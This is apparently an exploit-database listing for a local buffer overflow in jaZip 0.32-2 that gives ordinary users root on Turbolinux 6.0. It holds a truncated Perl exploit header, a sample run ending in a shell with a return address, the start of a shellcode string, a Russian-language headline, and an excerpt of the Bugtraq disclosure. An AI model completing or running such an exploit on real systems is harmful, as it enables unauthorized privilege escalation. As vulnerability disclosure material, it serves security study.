jaZip 0.32-2 - Local Buffer Overflow

!/usr/bin/perl jaZip Exploit / Tested version: jaZip-0.32-2 / anno 2000 || http://teleh0r.cjb.net/ Vulnerable: Turbolinux 6.0 teleh0r@localhost teleh0r$ rpm -q jaZip jaZip-0.32-2 teleh0r@localhost teleh0r$ ./jazip-exploit.pl Address: 0xbffff7ac bash $shellcode = Shellcode by: Taeho Oh "\xeb\x1f"....

Дырка в JAZIP

Классическое переполнение буфера...

Vulnerability in jaZip.

Dear, Bugtraq. jaZip is a program for managing an Iomega Zip or Jaz drive. It is often installed setuid root - and because of a buffer overflow it is possible for regular users to become root. Please excuse me if this was know. Please note that I can not guarantee that this information is correct...